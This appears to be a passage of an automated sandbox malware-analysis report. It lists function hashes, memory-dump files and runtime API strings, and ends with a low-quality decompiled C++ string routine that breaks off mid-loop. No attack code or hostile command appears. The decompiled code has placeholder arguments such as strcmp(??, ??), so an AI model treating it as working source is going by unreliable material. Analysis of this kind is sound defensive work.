Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 28b9e7b6b983392d60710298970cb7e4893171079cccd72b6c628f224c4ba3d1
Instruction ID: dcf462f695e272ec5e4903cf284c9fffd384d3dc2991a7d5fc220b5a1f497617
Opcode Fuzzy Hash: 28b9e7b6b983392d60710298970cb7e4893171079cccd72b6c628f224c4ba3d1
Instruction Fuzzy Hash: 3AF04FB5A183444FC710BF77C4C551BBBE4AF2A708F01486FE8848B313E678C8408B96

Uniqueness

Uniqueness Score: -1.00%

Function 00484844 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9bff5544a1ec6a361663c87efaa6cb92bb51f736a2247eb7bb325a39792da2a4
Instruction ID: 49035c3cbc465f283b51bc135496e5912d83d1e84f3f25223dd9a3cc44818511
Opcode Fuzzy Hash: 9bff5544a1ec6a361663c87efaa6cb92bb51f736a2247eb7bb325a39792da2a4
Instruction Fuzzy Hash: 09F0ECB5A143048FC714BFBAC59652EB7E4BF5A308F40496EE985DB313E738D8448B86

Uniqueness

Uniqueness Score: -1.00%

Function 004A01AB Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0d95337e9488b77ee4d47ca56d38ba50d18ad2fca1bddbddd3f3d43041dd65dd
Instruction ID: 6bb6dccdfc297eb8eee14600070ea890d214f03df28c5a041a47ef4e7c605243
Opcode Fuzzy Hash: 0d95337e9488b77ee4d47ca56d38ba50d18ad2fca1bddbddd3f3d43041dd65dd
Instruction Fuzzy Hash: 7BF08CB19042049FC710BF39944169ABBA8EB05368F00942EED4887205E735C95587C5

Uniqueness

Uniqueness Score: -1.00%

Function 004A029B Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0d95337e9488b77ee4d47ca56d38ba50d18ad2fca1bddbddd3f3d43041dd65dd
Instruction ID: 6bb6dccdfc297eb8eee14600070ea890d214f03df28c5a041a47ef4e7c605243
Opcode Fuzzy Hash: 0d95337e9488b77ee4d47ca56d38ba50d18ad2fca1bddbddd3f3d43041dd65dd
Instruction Fuzzy Hash: 7BF08CB19042049FC710BF39944169ABBA8EB05368F00942EED4887205E735C95587C5

Uniqueness

Uniqueness Score: -1.00%

Function 004A01FB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 99c885cc4b85e84058b8a9b28a028eeb0369a136c7b1f35f37d9dafa98f0113a
Instruction ID: 74606de2941e275cba65d879ce0ad08fbf8d22e884feb59a6ad3c6043c521e05
Opcode Fuzzy Hash: 99c885cc4b85e84058b8a9b28a028eeb0369a136c7b1f35f37d9dafa98f0113a
Instruction Fuzzy Hash: 69E0E5B19042049FD310BF35D44139AFFF8EB05358F00942DD94887205D7398955C7C6

Uniqueness

Uniqueness Score: -1.00%

Function 00431E1A Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 008dc3d99dc4dff0db1d7c6ff0d92186ca4803e436e8c1e9e2b52f75ef1e7aa8
Instruction ID: 3c4f707435d34038350cb6d7fa52d19f6cad7f28da7433bd1aefa28661c95df8
Opcode Fuzzy Hash: 008dc3d99dc4dff0db1d7c6ff0d92186ca4803e436e8c1e9e2b52f75ef1e7aa8
Instruction Fuzzy Hash: FBF062B8A062068FC348DF14D194861FBB1FF99300756A49EE8494B366C735E891CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004EEBEC Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction ID: 2a7543f1b5c1d9d8279d78365afe440eb7b77663ca9e7f691fe84507ff0f85e6
Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction Fuzzy Hash: 55E01A322105909BC7219A5BC840C96F7E8EF947B1B154566EA4697611D235FC41CA98

Uniqueness

Uniqueness Score: -1.00%

Function 00488BBB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4f5db8540a87f7a020a4f0470c6b4ebfb7be3793c03e41b50dccfa7beebf385a
Instruction ID: a24fe1e0a2c22a8d238f49419c663ef5a834ea19a2f632d5df655276cc4143cf
Opcode Fuzzy Hash: 4f5db8540a87f7a020a4f0470c6b4ebfb7be3793c03e41b50dccfa7beebf385a
Instruction Fuzzy Hash: 00D0C9A1E116045A86183F7A488202DA6B45A56308F85286EFC4557243FA28855003CE

Uniqueness

Uniqueness Score: -1.00%

Function 00470B64 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f831cace837b0b543be71905ed38f9f47ef666a0803183b7561f84cd90134013
Instruction ID: 2d4586fcfdd873213ab79755ec8dee076fb958712571c88d403843d95a893481
Opcode Fuzzy Hash: f831cace837b0b543be71905ed38f9f47ef666a0803183b7561f84cd90134013
Instruction Fuzzy Hash: E3C0026591470C45C6103FB385E707E96A4DE27308F012C1FA5C157113EA7CC48046DE

Uniqueness

Uniqueness Score: -1.00%

Function 00486C84 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: d7b5b9100874e0292ff31b9cafc11715cfb36d18ec153d36ebb6fdb2200f1442
Instruction ID: e3f3a161c9f18b6fdcf2d3889cac18f4f35aa746e9b956252ebea36034f9db67
Opcode Fuzzy Hash: d7b5b9100874e0292ff31b9cafc11715cfb36d18ec153d36ebb6fdb2200f1442
Instruction Fuzzy Hash: FCC0026591470C46C6103FB385D707E9664DE2770CF012C1FA6C157513EA7CC44046DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042C470 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe4a5c730f25fc9888ce67d226b0ff7384fd8932a890f570a862b5e3ca627b7
Instruction ID: b388c2251a59f43fd6e52c5f27581e78781c4411d0d5c9edf0ac91079a2a92c7
Opcode Fuzzy Hash: abe4a5c730f25fc9888ce67d226b0ff7384fd8932a890f570a862b5e3ca627b7
Instruction Fuzzy Hash: 2FC012B0C0424046C2007F348506128BDB06F5330CF84585CE44013202E639C018465F

Uniqueness

Uniqueness Score: -1.00%

Function 00475351 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf85daa884aeecaee8ce25f79ee4b4a930247f485f1040a49eb34e19ca3eea24
Instruction ID: 6beb8ee86695f50391e83388a76e87107ccd61f792d5106770852a04d3688d64
Opcode Fuzzy Hash: cf85daa884aeecaee8ce25f79ee4b4a930247f485f1040a49eb34e19ca3eea24
Instruction Fuzzy Hash: 0FB01213F40801079E00CD18DD17B76B3F0E343310F1630101471F7110C106C411C64C

Uniqueness

Uniqueness Score: -1.00%

Function 0049EAA2 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 098ac4f3a7dbca42e75da5ebdadbaee3de600b7f511be6244becd6734c8c0245
Instruction ID: 9cfadc15aec0a5bafe13421e804a9d168c1475359bcf0d52a22eb00ec1b5afe0
Opcode Fuzzy Hash: 098ac4f3a7dbca42e75da5ebdadbaee3de600b7f511be6244becd6734c8c0245
Instruction Fuzzy Hash: 10B012E2C09304899B000D204840630E9704907210E543542020573371E3A5C811840F

Uniqueness

Uniqueness Score: -1.00%

Function 0042DF40 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 113fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042DFB1
fwrite.MSVCRT ref: 0042E053
fputs.MSVCRT ref: 0042E066
fwrite.MSVCRT ref: 0042E089
fputs.MSVCRT ref: 0042E09D
fwrite.MSVCRT ref: 0042E0C7
abort.MSVCRT ref: 0042E0CC
free.MSVCRT ref: 0042E0D4
abort.MSVCRT ref: 0042E139
fwrite.MSVCRT ref: 0042E161

Strings

terminate called without an active exception, xrefs: 0042E153
-, xrefs: 0042E143
terminate called after throwing an instance of ', xrefs: 0042E045
not enough space for format expansion (Please submit full bug report at http://gcc.gnu.org/bugs.html): , xrefs: 0042DF51
terminate called recursively, xrefs: 0042E0B9

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: fwrite$abortfputs$freememcpy
String ID: -$not enough space for format expansion (Please submit full bug report at http://gcc.gnu.org/bugs.html): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 1748391741-837261893
Opcode ID: 6a834da6b6b146f8822325c18b1359ea73434e2780b2d5d817d484c365acc2e6
Instruction ID: a226534c6e8664fcbd8913f8464b36c9a281fef7d5404d740806d0bf51c83a46
Opcode Fuzzy Hash: 6a834da6b6b146f8822325c18b1359ea73434e2780b2d5d817d484c365acc2e6
Instruction Fuzzy Hash: 084159B0508358DED710AF22D48876BBBE0EF45304F40C95EE9988B342D7799589DF96

Uniqueness

Uniqueness Score: -1.00%

Function 004364A0 Relevance: 19.9, APIs: 11, Strings: 2, Instructions: 366
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E004364A0(char** __ecx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v16;
				void* _v20;
				char _v32;
				intOrPtr _v36;
				char* _v40;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				intOrPtr _v112;
				intOrPtr _v124;
				char* _v128;
				int _v132;
				char* _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t142;
				char _t145;
				int _t149;
				char _t151;
				int _t152;
				char** _t154;
				int _t155;
				intOrPtr _t158;
				int _t159;
				int _t162;
				char* _t165;
				int _t166;
				char** _t168;
				int _t169;
				char* _t171;
				char* _t173;
				int _t177;
				char* _t179;
				char* _t181;
				char** _t183;
				int _t184;
				char* _t186;
				char* _t188;
				int _t193;
				char* _t196;
				int _t202;
				char* _t205;
				char** _t209;
				int _t210;
				char* _t213;
				char* _t220;
				char* _t226;
				signed int _t227;
				char* _t228;
				char* _t229;
				char* _t230;
				char* _t231;
				char* _t232;
				char* _t235;
				char** _t236;
				char* _t238;
				char* _t245;
				char* _t254;
				void* _t257;
				void* _t260;
				char* _t261;
				char* _t264;
				char* _t267;
				char* _t270;
				char* _t271;
				char* _t272;
				intOrPtr* _t273;
				char* _t274;
				intOrPtr _t275;
				char* _t276;
				char* _t277;
				char* _t278;
				char* _t279;
				char* _t280;
				char* _t281;
				char** _t282;
				char** _t283;
				void* _t284;
				char** _t285;
				void* _t286;
				void* _t287;
				char** _t290;
				void* _t291;
				char** _t296;
				void* _t297;
				void* _t298;
				void* _t299;
				void* _t300;

				_t142 = __ecx + 8;
				_t284 = _t286;
				_t282 = __ecx;
				_t287 = _t286 - 0x2c;
				 *((intOrPtr*)(__ecx)) = _t142;
				_v36 = _t142;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 4) = 0;
				_t271 =  *( *_a4 + 0x10);
				_t145 =  *_t271;
				_v40 = _t145;
				if(_t145 == 0) {
					_v48 = 0x2a;
					_v52 = 1;
					_v56 = 0;
					_v60 = 0;
					E004982F0(1, __ecx, _t271, __ecx, _t284);
					goto L23;
				} else {
					if(_t271[4] == 0) {
						L22:
						_t272 = _v40;
						_t149 = strlen(_t272);
						_v52 = _t272;
						_v48 = _t149;
						_v56 = 0;
						_v60 = 0;
						L004979A0(1, _t282, _t272, _t282, _t284);
						L23:
						return _t282;
					} else {
						_t235 = _v40;
						while(1) {
							_t151 = _t271[4];
							_v60 = _t235;
							_v56 = _t151;
							_v32 = _t151;
							_t152 = strcmp(??, ??);
							_t235 = _v32;
							if(1 > 4) {
								break;
							}
							if(_t152 == 0) {
								continue;
							}
							break;
						}
						if(_t152 == 0) {
							goto L22;
						} else {
							_v60 = 0x80;
							_t236 = _t282;
							E004999D0(_t236);
							_t154 =  *0x4f6394; // 0x4f6300
							_t290 = _t287 - 4;
							_t226 =  *_t154;
							_v64 = _t226;
							_t155 = strlen(??);
							if(_t155 > 0x7fffffff - _t282[1]) {
								L35:
								_v60 = "basic_string::append";
								E004A57E0();
								goto L36;
							} else {
								_v56 = _t155;
								_v60 = _t226;
								_t236 = _t282;
								E00499B70(_t236);
								_t290 = _t290 - 8;
								_t196 =  *_t282;
								_t232 = _t282[1];
								_t271 =  &(_t232[1]);
								if(_v36 == _t196) {
									_t261 = 0xf;
								} else {
									_t261 = _t282[2];
								}
								if(_t271 > _t261) {
									_v48 = 1;
									_v52 = 0;
									_t236 = _t282;
									_v56 = 0;
									_v60 = _t232;
									E00499D40(_t236);
									_t290 = _t290 - 0x10;
									_t196 =  *_t282;
								}
								_t196[_t232] = 0x3d;
								_t282[1] = _t271;
								( *_t282)[ &(_t232[1])] = 0;
								_t226 =  *( *( *_a4 + 0x10));
								_t202 = strlen(_t226);
								if(_t202 > 0x7fffffff - _t282[1]) {
									L36:
									_v60 = "basic_string::append";
									E004A57E0();
									0;
									_push(_t284);
									_t285 = _t290;
									_push(_t271);
									_push(_t282);
									_push(_t226);
									_t283 = _t236;
									_t291 = _t290 - 0x3c;
									 *_t236 = 0x4f057c;
									_t273 =  *((intOrPtr*)( *_v56 + 0x10));
									_t158 =  *_t273;
									_v112 = _t158;
									if(_t158 == 0) {
										_t159 =  *0x4f0570; // 0x0
										_v124 = 0x2a;
										_v128 = 1;
										_v136 = 0;
										_v132 = _t159;
										L00472F20(_t236, _t285);
										goto L54;
									} else {
										if( *((intOrPtr*)(_t273 + 4)) == 0) {
											L55:
											_t274 = _v56;
											_t162 = strlen(_t274);
											_v136 = _t274;
											_v132 = _t162;
											L004739B0(_t283);
											return _t283;
										} else {
											_t238 = _v56;
											_t227 = 0;
											while(1) {
												_t227 =  &(1[_t227]);
												_t165 =  *((intOrPtr*)(_t273 + _t227 * 4));
												_v136 = _t238;
												_v132 = _t165;
												_v52 = _t165;
												_t166 = strcmp(??, ??);
												_t238 = _v52;
												if(_t227 > 4) {
													break;
												}
												if(_t166 == 0) {
													continue;
												}
												break;
											}
											if(_t166 == 0) {
												goto L55;
											} else {
												_v136 = 0x80;
												E00474640(_t283);
												_t168 =  *0x4f6394; // 0x4f6300
												_t296 = _t291 - 4;
												_t228 =  *_t168;
												 *_t296 = _t228;
												_t169 = strlen(??);
												 *_t296 = _t228;
												_v136 = _t169;
												L00473670(_t283);
												_t171 =  *_t283;
												_t297 = _t296 - 8;
												_t275 =  *((intOrPtr*)(_t171 - 0xc));
												_t229 = _t275 + 1;
												if(_t229 <=  *((intOrPtr*)(_t171 - 8))) {
													if( *((intOrPtr*)(_t171 - 4)) > 0) {
														goto L44;
													} else {
														goto L45;
													}
													goto L66;
												} else {
													L44:
													_v136 = _t229;
													E00474640(_t283);
													_t171 =  *_t283;
													_t297 = _t297 - 4;
												}
												L45:
												_t171[ *((intOrPtr*)(_t171 - 0xc))] = 0x3d;
												_t173 =  *_t283;
												_t94 = _t173 - 0xc; // -12
												if(_t94 != 0x4f0570) {
													 *(_t173 - 4) = 0;
													 *((intOrPtr*)(_t173 - 0xc)) = _t229;
													_t173[_t275 + 1] = 0;
												}
												_t230 =  *( *( *_v0 + 0x10));
												_t177 = strlen(_t230);
												_v136 = _t230;
												_v132 = _t177;
												L00473670(_t283);
												_t298 = _t297 - 8;
												_t231 = 4;
												do {
													_t179 =  *_t283;
													_t254 =  *((intOrPtr*)(_t179 - 0xc));
													_t276 = _t254 + 1;
													_v52 = _t254;
													if(_t276 <=  *((intOrPtr*)(_t179 - 8))) {
														if( *((intOrPtr*)(_t179 - 4)) > 0) {
															goto L48;
														} else {
															goto L49;
														}
														goto L66;
													} else {
														L48:
														_v136 = _t276;
														E00474640(_t283);
														_t179 =  *_t283;
														_t298 = _t298 - 4;
													}
													L49:
													_t179[ *((intOrPtr*)(_t179 - 0xc))] = 0x3b;
													_t181 =  *_t283;
													_t104 = _t181 - 0xc; // -12
